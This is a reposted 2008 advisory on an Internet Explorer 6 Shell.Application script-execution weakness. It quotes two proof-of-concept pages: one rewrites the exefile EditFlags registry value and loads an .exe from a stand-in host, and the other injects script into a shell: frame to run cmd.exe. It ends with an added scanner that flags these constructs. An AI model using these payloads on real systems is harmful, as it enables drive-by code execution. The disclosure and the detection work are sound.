Jun 21, 2008

[malware] Microsoft Internet Explorer Shell.Application Object Script Execution Weakness

Vulnerable: Microsoft Internet Explorer 6.0 SP1 – Microsoft Internet Explorer 6.0

Credit:     “[email protected]” <[email protected]> disclosed this weakness.

Several proof-of-concept examples have been presented:

“Matthew Murphy” <[email protected]> proposed:

<html><head>
<script language="JavaScript" defer>
function throw_onload() {
  actx.RegWrite("HKCR\\exefile\\EditFlags", 0x38070000, "REG_BINARY");
  window.close();
}
var actx = new ActiveXObject("WScript.Shell");
actx.RegWrite("HKCR\\exefile\\EditFlags", 256, "REG_BINARY");
document.writeln("<IFRAME SRC=\"http://www.somebadsite.com/file.exe\" ONLOAD=\"throw_onload()\" />");
window.setTimeout("throw_onload()", 5000); // Don't know for sure if IE fires OnLoad for .exe files! Anyone?
</script></head><body></body></html>

“[email protected]” <[email protected]> presented:

<iframe src="shell:windows\web\tip.htm" style="width:400px;height:200px;"></iframe>
<textarea id="code" style="display:none;">
injected.
<script language="JScript" DEFER>
alert('attempting injection');
var obj=new ActiveXObject("Shell.Application");
obj.ShellExecute("cmd.exe","/c pause");
</script>
</textarea>
<script language="javascript">
function doit() {
  document.frames[0].document.body.insertAdjacentHTML('afterBegin',
    document.all.code.value);
}
setTimeout("doit()", 2000);
</script>
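
For triage of saved pages or proxy captures, the following is an added example (not part of the original advisory or either poster's code): a static scanner that flags the constructs the two proofs of concept above use, namely script-created `Shell.Application` / `WScript.Shell` objects, a frame loaded from a `shell:` URL, markup inserted into another frame's document, and the `exefile\EditFlags` registry write. The rule ids, the `scanHtml` function and the sample strings are assumptions made for illustration.

```javascript
// Added example: static scan for constructs used by the two proofs of concept.
// Rule ids, scanHtml() and the sample strings are constructed for illustration.
const RULES = [
  // Page script instantiating a shell-capable ActiveX object.
  { id: "activex-shell-object",
    re: /ActiveXObject\s*\(\s*["'](?:Shell\.Application|WScript\.Shell)["']/ },
  // Frame whose source is a shell: URL.
  { id: "shell-scheme-frame", re: /<i?frame\b[^>]*\bsrc\s*=\s*["']?shell:/ },
  // Markup inserted into another frame's document.
  { id: "cross-frame-insert",
    re: /frames\s*\[[^\]]*\]\s*\.document\b[^;]*\.insertAdjacentHTML/ },
  // Registry write to the exefile EditFlags value.
  { id: "exefile-editflags-write",
    re: /RegWrite\s*\(\s*["']HKCR\\{1,2}exefile\\{1,2}EditFlags/ },
  { id: "shellexecute-call", re: /\.ShellExecute\s*\(/ },
];

// Copies of such pages often carry typographic quotes; fold them to ASCII
// (one character for one character, so offsets and line numbers are kept).
function normalize(html) {
  return html.replace(/[\u201C\u201D]/g, '"').replace(/[\u2018\u2019]/g, "'");
}

// Return [{rule, line}] for every match, ordered by line number.
function scanHtml(html) {
  const text = normalize(html);
  const findings = [];
  for (const rule of RULES) {
    for (const m of text.matchAll(new RegExp(rule.re.source, "gi"))) {
      const line = text.slice(0, m.index).split("\n").length;
      findings.push({ rule: rule.id, line });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed samples: indicator strings only, plus a harmless page.
const SAMPLE = [
  "<iframe src=\u201Cshell:windows\\web\\tip.htm\u201D",
  " style='width:400px'></iframe>",
  "<script>",
  "var obj = new ActiveXObject(\u201CShell.Application\u201D);",
  "document.frames[0].document.body.insertAdjacentHTML('afterBegin', x);",
  "</script>",
].join("\n");
const BENIGN = '<iframe src="https://example.com/"></iframe>\n<script>var a = [1];</script>';

console.log(scanHtml(SAMPLE), scanHtml(BENIGN));
```

Matching of this kind only sees constructs written in clear text, so a hit is a reason to inspect the page and a clean result is not proof that a page is harmless.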
